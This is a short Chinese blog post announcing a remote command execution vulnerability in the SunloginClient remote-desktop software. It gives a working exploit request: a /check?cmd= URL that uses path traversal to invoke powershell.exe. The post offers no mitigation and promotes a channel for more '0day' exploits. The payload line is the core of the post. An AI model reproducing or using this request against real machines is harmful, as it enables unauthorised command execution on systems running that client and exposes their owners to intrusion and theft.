向日葵远程命令执行漏洞(sunloginclient rce)

具体发现过程是通过脱壳后下发指令抓包获取到的,之前看了某大佬的分析文章感觉我顶多叫个找位置吧,那就给出位置吧:

/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+

更多0day请订阅我~,也可关注圈子N多0day会在里面发布!

向日葵远程命令执行漏洞(sunloginclient rce)_第1张图片

 

你可能感兴趣的:(漏洞分析&复现,向日葵,rce,远程命令执行)